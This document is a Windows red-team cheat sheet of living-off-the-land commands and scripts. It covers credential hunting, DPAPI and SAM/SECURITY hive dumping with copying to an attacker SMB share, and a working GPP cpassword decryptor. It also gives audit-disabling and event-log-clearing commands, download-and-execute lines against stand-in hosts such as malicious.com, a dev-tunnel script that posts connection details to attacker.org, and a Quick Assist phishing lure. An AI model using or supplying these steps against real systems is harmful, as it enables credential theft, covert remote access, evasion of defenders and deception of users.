Windows - Helpful Binaries and Useful Tricks






Host Enumeration

OS Info
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
gpresult /z



Monitoring, Creds and Covering Tracks

Search for Creds in Registry and Config files
findstr /snip password *.xml *.ini *.txt
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Potential Credential Locations

PowerShell history: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
VNC: vnc.ini, ultravnc.ini, anything matching *vnc*
Web stacks (XAMPP, Apache, PHP, MySQL, Tomcat): web.config, php.ini, httpd.conf, httpd-xampp.conf, my.ini, my.cnf, config.php, server.xml, tomcat-users.xml, access.log, error.log
McAfee: SiteList.xml
Keys, certs and VPN: .gpg, .pgp, *.p12, *.der, *.csr, *.cer, known_hosts, id_rsa, id_dsa, *.ovpn
Elastic: elasticsearch.yml, kibana.yml
Service configs: anaconda-ks.cfg, hostapd.conf, rsyncd.conf, cesi.conf, supervisord.conf, FreeSSHDservice.ini, setupinfo, setupinfo.bak
KeePass: *.kdbx, KeePass.config
Hives and AD database: Ntds.dit, SAM, SYSTEM
Browsers: key3.db, key4.db, places.sqlite (Firefox); "Login Data", Cookies, Bookmarks, History (Chrome); TypedURLs, TypedURLsTime (IE, in the registry)
Windows files worth grabbing:
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

Search all of the proposed files:

cd C:\

dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.cer == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == httpd-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-ChildItem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse

DPAPI - Extracting Protected Data

The DPAPI (Data Protection API) is a Windows component that lets applications encrypt sensitive data (passwords, browser credentials, Wi-Fi keys, private keys) without managing keys themselves. Each protected blob is encrypted with a per-user master key. Master keys are 64 bytes of random data and live, encrypted, under %APPDATA%\Microsoft\Protect\{SID}\ (one file per master key GUID), where {SID} is the user's Security Identifier. The master key file is itself protected by a key derived from the user's password, so with the user's password, or with the domain DPAPI backup key, you can decrypt the master key and then everything it protects. The Protect directory and the files in it carry the hidden and system attributes, so a plain dir shows nothing; use dir /a from cmd or Get-ChildItem -Force from PowerShell.

https://github.com/login-securite/DonPAPI

TODO: Check out this .Net implementation and see if we can use it in Sorrowset/Sadrat https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1

# List secrets in vault
vaultcmd /listcreds:"Windows Credentials" /all

# Location of master key files (one file per master key GUID)
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SID\$GUID
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}

# Hidden Protected Data
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Copy the master key file and the protected blob (for example a file from the Credentials directory) to your machine and use impacket's dpapi.py: decrypt the master key first (you need the user's SID, which is the directory name, plus the user's password or the domain backup key), then decrypt the blob with the recovered key.

# Decrypt a master key with the user's password
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $USER_PASSWORD

# Domain joined: export the domain backup key (needs Domain Admin) and use it to decrypt any domain user's master key
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$DC --export
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"

# Decrypt a DPAPI-protected credential blob with the decrypted master key (the 0x... hex value printed by the step above)
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
RegKeys - Offline SAM, SECURITY, SYSTEM Hives Credential Extraction

If you have offline access to a system drive (or an admin shell on the box), you can export the SAM, SECURITY and SYSTEM hives; the boot key stored in SYSTEM is what decrypts the hashes in SAM and the LSA secrets and cached domain credentials in SECURITY.

TODO: Check out this .Net implementation see if we can use it as a module in Sadrat and stop using reg.exe https://github.com/EncodeGroup/RegSave/tree/master

# For Local accounts On Victim
reg save HKLM\SAM C:\temp\sammy
reg save HKLM\SYSTEM c:\temp\syssy

# Try for AD accounts, too
reg save HKLM\SECURITY c:\temp\seccy
cd C:\Temp

# Start smbserver on Attacker machine (the UNC host name must resolve on the victim; using the attacker IP instead of 'JustAPrinter' also works)
smbserver.py share . -smb2support -username mello -password sec

# On Victim, transfer the hive files
net use \\JustAPrinter\share sec /user:mello
copy syssy \\JustAPrinter\share
copy sammy \\JustAPrinter\share
copy seccy \\JustAPrinter\share

# Dump Credentials
secretsdump.py -sam sammy -security seccy -system syssy LOCAL

RegKeys - Additional Registry Creds / Taking Ownership

# Take ownership of a file (needs SeTakeOwnershipPrivilege, i.e. an admin token); cmd wants double quotes, not single
takeown /f "C:\some\file.txt" #Now the file is owned by you
icacls "C:\some\file.txt" /grant %USERNAME%:F #Now you have full access

# Use this with files that might contain credentials such as
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
c:\inetpub\wwwroot\web.config
RegKeys - AlwaysInstallElevated - Current User and All Users (both values must be 1; then any .msi you install with msiexec runs as SYSTEM)
reg query "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" /v "AlwaysInstallElevated"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer" /v "AlwaysInstallElevated"
RegKeys - Security - Check what's audited, whether WEF is used, and whether LSA Protection (RunAsPPL) and Credential Guard (LsaCfgFlags) are enabled
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
RegKeys - WDigest & Cached Credentials Count
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Auditpol - Strategic Disable of Auditing (needs admin; the policy change itself is logged as event 4719 in the Security log)
C:\Windows\System32\auditpol.exe /set /category:"Detailed Tracking" /success:disable /failure:disable
whoami /priv
net localgroup
C:\Windows\System32\auditpol.exe /set /category:"Detailed Tracking" /success:enable /failure:enable
Check Command History - Check for history and transcription logging
cat (Get-PSReadlineOption).HistorySavePath
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
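The registry checks in the RegKeys - AlwaysInstallElevated, RegKeys - Security, RegKeys - WDigest & Cached Credentials Count and Check Command History sections above, done in one PowerShell pass that also interprets the values. This is an added example, not code from the original page. It assumes it runs on the host being assessed in an interactive PowerShell session (the PSReadLine lookup is skipped otherwise), and treats a missing value as "Windows default applies".

```powershell
function Get-RegValue {
    # Returns the named registry value, or $null when the key or value does not exist
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-CredentialExposurePosture {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $psp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    $aieM = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $aieU = Get-RegValue 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $ppl  = Get-RegValue $lsa 'RunAsPPL'
    $cg   = Get-RegValue $lsa 'LsaCfgFlags'
    $wd   = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    $clc  = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount'
    $wef  = Get-Item 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager' -ErrorAction SilentlyContinue
    $sbl  = Get-RegValue "$psp\ScriptBlockLogging" 'EnableScriptBlockLogging'
    $tr   = Get-RegValue "$psp\Transcription" 'EnableTranscripting'
    $trd  = Get-RegValue "$psp\Transcription" 'OutputDirectory'

    # LsaCfgFlags: 1 = Credential Guard on with UEFI lock, 2 = on without lock, 0 or absent = off
    $cgState = 'off'
    if ($cg -eq 1) { $cgState = 'on (UEFI lock)' } elseif ($cg -eq 2) { $cgState = 'on (no lock)' }

    # CachedLogonsCount is a REG_SZ; absent means the default of 10 cached domain logons (DCC2 hashes)
    $cached = 10
    if ($null -ne $clc) { $cached = [int]$clc }

    # PSReadLine is only loaded in interactive consoles
    $hist = $null
    try { $hist = (Get-PSReadLineOption).HistorySavePath } catch { }

    [pscustomobject]@{
        AlwaysInstallElevated = ($aieM -eq 1 -and $aieU -eq 1)   # msiexec installs as SYSTEM only when BOTH are 1
        LsaProtection         = [bool]$ppl                        # RunAsPPL 1 or 2: LSASS runs as a protected process
        CredentialGuard       = $cgState
        WDigestPlaintext      = ($wd -eq 1)                       # 1 = LSASS keeps plaintext creds for WDigest
        CachedLogonsCount     = $cached
        WefSubscriptions      = ($null -ne $wef -and $wef.Property.Count -gt 0)  # events forwarded to a collector
        ScriptBlockLogging    = ($sbl -eq 1)                      # event 4104 in Microsoft-Windows-PowerShell/Operational
        Transcription         = ($tr -eq 1)
        TranscriptDirectory   = $trd
        PSReadLineHistory     = $hist
    }
}

Get-CredentialExposurePosture | Format-List
```

Read the output as an attacker would: AlwaysInstallElevated true, WDigestPlaintext true and LsaProtection/CredentialGuard off are the easy wins; WefSubscriptions, ScriptBlockLogging and Transcription true tell you that the commands you run next are being recorded somewhere you cannot clear with wevtutil.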
Clear command and Powershell History
# Prefetch entries for cmd.exe live in %WINDIR%\Prefetch (not the user's Recent folder); deleting them needs admin
del /F /Q "%WINDIR%\Prefetch\CMD.EXE-*.pf"
del /F /Q "%UserProfile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
del /F /Q "%UserProfile%\Documents\PowerShell\ConsoleHost_history.txt"
Check Event Logs - Available Event Logs, Last 50 by Source (/rd:true returns newest first, /f:text renders them readable)
wevtutil el
wevtutil qe Application /c:50 /rd:true /f:text
wevtutil qe System /c:50 /rd:true /f:text
wevtutil qe Security /c:50 /rd:true /f:text
wevtutil qe ForwardedEvents /c:50 /rd:true /f:text
wevtutil qe Microsoft-Windows-Sysmon/Operational /c:50 /rd:true /f:text
Clear Event Logs - By Log Name (needs admin; clearing Security writes event 1102 and clearing other logs writes event 104, so an empty log is itself an indicator, and anything already forwarded by WEF is gone from your reach)
wevtutil el
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl Microsoft-Windows-Sysmon/Operational



Recon

findstr.exe - Search SYSVOL for GPP Service Account Creds
findstr /S /I cpassword \\$domain\sysvol\$domain\policies\*.xml
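The findstr above only tells you which GPP XML files carry a cpassword. The PowerShell below, added here as an example (not code from the original page), walks SYSVOL, extracts each cpassword together with the account it belongs to, and decrypts it with the AES-256 key Microsoft published in the MS-GPPREF specification. It assumes you can read \\<domain>\SYSVOL and that $Domain is the DNS name of the domain; the sample cpassword at the bottom is a value widely reproduced in public GPP write-ups, included only so the decoder can be exercised offline.

```powershell
function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # AES-256 key from MS-GPPREF 2.2.1.1.4 (public since 2012)
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    # GPP stores the base64 without '=' padding; restore it before decoding
    $pad = '=' * ((4 - ($Cpassword.Length % 4)) % 4)
    $cipher = [Convert]::FromBase64String($Cpassword + $pad)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $key
    $aes.IV      = New-Object byte[] 16          # the spec uses an all-zero IV
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    $aes.Dispose()
    [System.Text.Encoding]::Unicode.GetString($plain)   # plaintext is UTF-16LE
}

function Find-GppPassword {
    param([Parameter(Mandatory)][string]$Domain)
    $root  = "\\$Domain\SYSVOL\$Domain\Policies"
    # Preference files that can carry credentials
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $root -Recurse -File -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = Get-Content -Path $_.FullName -Raw
        # Match each <Properties .../> element that has a cpassword attribute, so user and password come from the same element
        foreach ($tag in [regex]::Matches($xml, '(?i)<Properties\b[^>]*\bcpassword="[^"]*"[^>]*>')) {
            $t  = $tag.Value
            $cp = [regex]::Match($t, '(?i)\bcpassword="([^"]*)"').Groups[1].Value
            if (-not $cp) { continue }                 # empty cpassword = no stored password
            $un = [regex]::Match($t, '(?i)\b(userName|runAs|accountName)="([^"]*)"').Groups[2].Value
            $pw = try { ConvertFrom-GppCpassword $cp } catch { '<decrypt failed>' }
            [pscustomobject]@{ File = $_.FullName; UserName = $un; Password = $pw }
        }
    }
}

# Offline check of the decoder with a constructed sample (the cpassword value circulated in GPP write-ups)
ConvertFrom-GppCpassword 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

# Live: Find-GppPassword -Domain corp.local | Format-Table -AutoSize
```

MS14-025 stopped new cpassword values being written, but it did not remove existing ones from SYSVOL, which is why this still pays off on long-lived domains; reading SYSVOL needs nothing more than a domain account.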
findstr.exe - Find open shares, make a list, then connect to each one, search it for "password", and disconnect before the next
@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
 C:
 net use Z: /delete /y
 net use Z: "%%a"
 echo %%a
 echo %%a >> "C:\Temp\output_file.txt"
 if exist Z:\ (
  Z:
  findstr /snip password * >> "C:\Temp\output_file.txt"
 )
)
dsquery.exe - Server - Search Directory

Reference: https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb

C:\Windows\System32\dsquery.exe (present on DCs and where RSAT is installed; -s targets a specific DC by name or IP, -d takes a domain name)

dsquery subnet -limit 0

dsquery computer -limit 0

dsquery user -limit 0

dsquery group -limit 0

dsquery * -filter "(objectClass=trustedDomain)" -attr *

dsquery group -name "Domain Admins"

# admin groups, queried against a specific DC (-s); 192.168.2.1 is the DC
dsquery group -name *admin* -s 192.168.2.1
dsquery * -filter "(&(objectclass=group)(name=*admin*))" -attr name samaccountname -s 192.168.2.1
dsquery * -filter "(&(objectclass=group)(samaccountname=Domain Admins))" -attr name samaccountname member -s 192.168.2.1

# name and SAM account name of all computers with "win" in the name
dsquery * -filter "(&(objectclass=computer)(name=*win*))" -attr name samaccountname -s 192.168.2.1
PortQry.exe - Server - Check remote port status (PortQry is a separate Microsoft download, not built into Windows)
portqry -local

portqry -local -l [Logfile Name] -v

portqry -n [IP] -e [PortToQuery]
Portquery.exe - Server - Script to check ports for list of IPs
@echo off
setlocal EnableDelayedExpansion

set "outputFile=portqry_results.txt"
set "portList=22,80,139,443,445,3389,389,8080"

:: Clear the output file
break > "%outputFile%"

for /f %%i in (iplist.txt) do (
    for %%p in (%portList%) do (
        echo Checking IP %%i on port %%p
        portqry -n %%i -e %%p >> "%outputFile%"
        echo. >> "%outputFile%"
    )
)

echo Results have been saved to %outputFile%



Downloading / Transferring Files

Certutil.exe - Transfer (a copy also lands in the CryptnetUrlCache; remove it with certutil -urlcache <url> delete)
certutil.exe -urlcache -split -f http://malicious.com/malware.exe "%AppData%\malware.exe"
certreq.exe - Transfer (POSTs a local file to the URL and writes the HTTP response body to the output file)
certreq.exe -Post -config http://malicious.com/malware.exe C:\Windows\win.ini "%AppData%\malware.exe"
bitsadmin.exe - Transfer, Execute as Jobs
bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe "%AppData%\malware.exe"

# Flagged as BITS abuse: copies cmd.exe out of System32 and runs it through the job's notify callback
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\Temp32\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\Temp32\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

# Remote download File
bitsadmin /create 2 & bitsadmin /addfile 2 https://live.sysinternals.com/autoruns.exe  c:\Temp32\autoruns.exe & bitsadmin /SetNotifyCmdLine 2 c:\Temp32\autoruns.exe NULL & bitsadmin /RESUME 2 & bitsadmin /Reset
bitsadmin.exe - Download, expand archive, open document (PowerShell; %VAR% does not expand there, use $env:VAR)
$path = "$env:LOCALAPPDATA\joboffer.zip"; bitsadmin.exe /transfer "DirectXUpdate" https://recruiting.azurewebsites.net/careers/joboffer.zip $path; Expand-Archive $path -DestinationPath "$env:LOCALAPPDATA\joboffer"; Start-Process "$env:LOCALAPPDATA\joboffer\offer.docx"
Configsecuritypolicy.exe tool - Download to Cache
ConfigSecurityPolicy.exe https://example.com/payload
Expand.exe - Download into ADS
expand.exe \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
robocopy.exe - Transfer
robocopy \\malicious-server\share "%AppData%" malware.exe
xcopy.exe - Transfer
xcopy \\malicious-server\share\malware.exe "%AppData%"
regsvr32.exe - Transfer, can also execute (scrobj.dll is the system scriptlet host, no path needed)
regsvr32 /s /n /u /i:http://malicious.com/malware.sct scrobj.dll
schtasks.exe - Transfer and Schedule Run (/ru SYSTEM needs an elevated shell; the task name in /run must match /create)
schtasks /create /tn "MaliciousTask" /tr "bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe %AppData%\malware.exe" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "MaliciousTask"
iexpress.exe - Create Self-Extracting EXE
iexpress.exe /N /Q /C "malicious.bat" /M "malicious.sed"
Wusa.exe - Extract from .cab (the /extract switch is gone from current Windows 10/11 builds; expand.exe does the same job: expand C:\path\to\malicious.cab -F:* C:\Temp)
wusa.exe C:\path\to\malicious.cab /extract:C:\Temp
reg.exe - Stash in the registry
reg add HKCU\Software\EncodedData /v Payload /t REG_SZ /d "BASE64_ENCODED_DATA"
reg query HKCU\Software\EncodedData /v Payload
Extrac32.exe - ADS, From Share, Regular Download
# Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

# Same, but the source CAB is pulled from a WebDAV share
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe

# Copy the source file to the destination file and overwrite it
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
findstr.exe - ADS trick to copy exe into file, share and Search SYSVOL remotely
# To Disk -Searches for the string GoatsnakeReissuez, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L GoatsnakeReissuez c:\ADS\file.exe > c:\ADS\file.txt:file.exe

# To Share - Searches for the string GoatsnakeReissuez, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L GoatsnakeReissuez \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe

# Search Share - Search for stored password in Group Policy files stored on SYSVOL.
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml



RMM - Remote Management, Dev Tunnel and Monitoring Software

Tricks for using and abusing remote management tools.

Dev Tunnel - Code.exe - Download and Create Tunnel, POST needed information to establish connection to attacker controller server/function
@echo off

set TEMPDIR=%APPDATA%\Microsoft\VSC
mkdir "%TEMPDIR%"
cd "%TEMPDIR%"
curl.exe -o vscode.zip https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
tar -xf vscode.zip
del vscode.zip

.\code.exe tunnel user logout
timeout /t 3
:: start /b so the batch does not block on the tunnel process; the redirect goes inside the child cmd
start /b "" cmd /c ".\code.exe tunnel --accept-server-license-terms --name fudgetunnel > output.txt"


timeout /t 3
setlocal enabledelayedexpansion
set "output="
for /f "delims=" %%a in (output.txt) do set "output=!output! %%a"
set "output=!output:~1!"
call :sendRequest
goto :eof

:sendRequest
curl.exe -X POST -H "X-Hook-Token: straylightsecurity" -H "Content-Type: application/json" --data-raw "{""sysinfo"":""%output%""}" https://serverless.attacker.org/logger
goto :eof
Dev Tunnel - Code.exe - VS Code CLI Expand from Share
cmd /Q /V /c "set TEMPDIR=%APPDATA%\Microsoft\VSC&& set IP=10.0.0.10&& mkdir "!TEMPDIR!" && cd /d "!TEMPDIR!" && expand \\!IP!\share\code.cab code.exe && .\code.exe tunnel user logout && timeout /t 3 && start /b "" cmd /c ".\code.exe tunnel --accept-server-license-terms --name fudge > output.txt" && timeout /t 3 && for /f "delims=" %a in (output.txt) do set output=!output! %a && curl.exe -X POST -H "Content-Type: application/json" --data-raw "{""devtunnel"":""!output!""}" https://serverless.attacker.org/logger"
RMM - QuickAssist / TeamViewer UAC Prompts

Quick Assist has the same problem as TeamViewer: UAC prompts open on the secure desktop, which the remote viewer sees as a black screen. The workaround is to open an elevated shell with runas before you need it. Quick Assist helpers can only authenticate with Microsoft (Live) or Entra ID accounts, on-prem AD accounts are not supported, so log in with a cloud account and elevate to a domain or local admin from a runas shell. TeamViewer does let you log in with local accounts, such as a local admin, but you may hit the "local user not allowed for remote logon" error; the same cloud-account-then-runas approach handles that too.

QuickAssist - Elevate Shell - RunAs Local, AD or AzureAD Admin User
runas /user:Administrator cmd.exe

runas /user:DOMAIN\Administrator cmd.exe

runas /user:AzureAD\Administrator cmd.exe
QuickAssist - Disable SecPol - Disable Blackscreen UAC Prompts for the session
secpol.msc

1. Browse Security Settings - Local Policies - Security Options - User Account Control: Switch to the secure desktop when prompting for elevation

2. Disable it

3. Do your admin work 

4. before you exit the session, make sure the above security setting is set to 'Enable'
QuickAssist - Invoke-QuickAssist - Install and Start If Quick Assist is missing / If a user is stuck in OOBE during Autopilot

Source: https://mrshannon.wordpress.com/2022/07/06/screen-share-from-oobe-with-quick-assist/ Script: https://www.powershellgallery.com/packages/Invoke-QuickAssist/1.0.5/Content/Invoke-QuickAssist.ps1

# Shift+F10 opens a command prompt during OOBE; start PowerShell from it
powershell -ep bypass -c "Install-Script -Name Invoke-QuickAssist -Force"
Invoke-QuickAssist.ps1
QuickAssist - URI Handler for Phishing Emails
<a href="ms-quick-assist://">Click Here for Help with your Document</a>
Use your customer code <b><u>12345678</u></b> to connect with a live support agent ready to assist you.

Virtualization

If you’re admin on a managed device, you may be better off to install virtualization software and use that to stay out of the windows logs and bypass the AV. WSL isn’t the blindspot it used to be against Defender but QEMU portable is a good option that does not require an install.

WSL - Install - Usually Requires Reboot
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
wsl --install

# Reboot (wmic is deprecated; shutdown.exe does the same)
shutdown /r /t 0
WSL - Remove
wsl --unregister Ubuntu
dism.exe /online /disable-feature /featurename:VirtualMachinePlatform
dism.exe /online /disable-feature /featurename:Microsoft-Windows-Subsystem-Linux
QEMU - QEMU Portable Emulator/Virtualizer

Portable virtualization and full system emulation tool.

Download QEMU zip with an iso, create a disk and start.

# Download QEMU
iwr https://github.com/MelloSec/RepeatOffender/raw/main/Tools/qemu.zip -OutFile qemu.zip; Expand-Archive qemu.zip; cd qemu;

# Parrot ISO
# iwr https://deb.parrot.sh/parrot/iso/5.3/Parrot-security-5.3_amd64.iso -OutFile parrot.iso

# Kali Live Boot
# iwr https://cdimage.kali.org/kali-2023.4/kali-linux-2023.4-live-amd64.iso -OutFile kali.iso

# Kali QEMU Prebuilt VM
# iwr https://cdimage.kali.org/kali-weekly/kali-linux-2024-W01-qemu-amd64.7z -OutFile kali.7z

# Ubuntu
iwr https://releases.ubuntu.com/focal/ubuntu-20.04.6-live-server-amd64.iso -OutFile ubuntu.iso

# Start the GUI
# .\QemuManager.exe

# Create the disk for the VM
.\qemu\qemu-img.exe create -f qcow2 myvm.qcow2 20G

# Start VM with ISO (-m is RAM in MB)
.\qemu\qemu-system-x86_64.exe -hda myvm.qcow2 -cdrom ubuntu.iso -boot d -m 2048
# .\qemu\qemu-system-x86_64.exe -hda myvm.qcow2 -cdrom parrot.iso -boot d -m 2048



Execution

settingsynchost.exe - execute - arbitrary background execution from %TEMP%

Rename your executable to settingsynchost.exe, move it into %TEMP%, then run the real SettingSyncHost.exe from System32 with the diagnostic-script switch (PowerShell, so $env:TEMP rather than %TEMP%):

mv malware.exe settingsynchost.exe

mv .\settingsynchost.exe $env:TEMP

C:\Windows\System32\SettingSyncHost.exe -LoadAndRunDiagScriptNoCab DoesntMatter
RegSvr
regsvr32 /s /n /u /i:http://malicious.com/malware.sct scrobj.dll
RegAsm
regasm.exe /U /codebase /nologo /silent "C:\Path\To\MaliciousAssembly.dll"
Installutil.exe - Basic Execution and Download to Cache
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe https://example.com/payload
CertOC.exe - DOWNLOAD / EXECUTE DLL
certoc.exe -GetCACAPS https://server.com/payload.dll
certoc.exe -LoadDLL payload.dll
Hh.exe - HTML Help - DOWNLOAD / EXECUTE
HH.exe http://some.url/payload.exe
HH.exe payload.exe
HH.exe c:\windows\system32\calc.exe
Control.exe

Execute evil.dll which is stored in an Alternate Data Stream (ADS) or CPL item called Microsoft.FolderOptions

control.exe c:\windows\tasks\file.txt:evil.dll

control.exe /name Microsoft.FolderOptions
ODBConf.exe - Load DLL as .rsp / maybe drivers
c:\windows\system32\odbcconf.exe -f file.rsp
forfiles.exe - Proxy execution: /c runs once for every file matching /m in /p, so matching a file that always exists (notepad.exe in System32) runs the payload once
forfiles.exe /p c:\windows\system32 /m notepad.exe /c "c:\path\to\payload.exe"
forfiles.exe /p c:\windows\system32 /m calc.exe /c cmd.exe
# From PowerShell, with the payload in the current directory
cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c "$pwd\AIQ_pid_binary.exe"
Rundll32 - Execute
rundll32.exe malicious.dll,EntryPoint

